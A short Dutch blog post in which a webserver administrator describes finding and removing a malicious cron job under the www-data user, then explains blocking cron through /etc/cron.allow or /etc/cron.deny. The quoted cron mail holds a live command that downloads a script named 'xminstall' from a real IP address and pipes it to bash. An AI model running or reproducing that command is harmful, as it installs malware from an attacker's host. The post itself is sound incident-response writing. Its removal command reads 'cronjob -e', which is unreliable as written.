Blokkeer cron voor bepaalde gebruikers

Een van mijn webservers begon veel mail te zenden:

Subject: Cron <www-data@localhost> (wget -q http://157.245.235.139/s/xminstall -O - || curl -fs http://157.245.235.139/s/xminstall)|bash
md5sum: /etc/cron.hourly/placekeeper: No such file or directory
bash: line 22: /etc/cron.hourly/placekeeper: Permission denied
bash: line 23: /etc/cron.hourly/placekeeper: Permission denied
bash: line 24: /etc/cron.hourly/placekeeper: Permission denied
bash: line 25: /etc/cron.hourly/placekeeper: Permission denied
chmod: cannot access '/etc/cron.hourly/placekeeper': No such file or directory
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)

Usage:
 kill [options] <pid> [...]

Options:
 <pid> [...]            send signal to every <pid> listed
 -<signal>, -s, --signal <signal>
                        specify the <signal> to be sent
 -l, --list=[<signal>]  list all signal names, or convert one to a name
 -L, --table            list all signal names in a nice table

 -h, --help     display this help and exit
 -V, --version  output version information and exit

For more details see kill(1).

Op zoek naar xminstall:

cd /var

grep -irn xminstall .

Het bleek dat www-data elke 20 minuten een cronjob uitvoerde. Deze heb ik verwijderd met:

sudo -u www-data cronjob -e

Om te voorkomen dat dit in de toekomst weer zou gebeuren moet www-data uitgesloten worden van het uitvoeren van crontaken. Dit kan op twee manieren:

1. Blokkeer cron standaard voor alle gebruikers door het bestand /etc/cron.allow aan te maken.

Alleen de gebruikers die hierin staan vermeld mogen crontaken uitvoeren

Of:

2. Blokkeer cron voor specifieke gebruikers door het bestand /etc/cron.deny aan te maken.

De  gebruikers die hierin staan vermeld mogen geen crontaken meer uitvoeren

 

Reactie toevoegen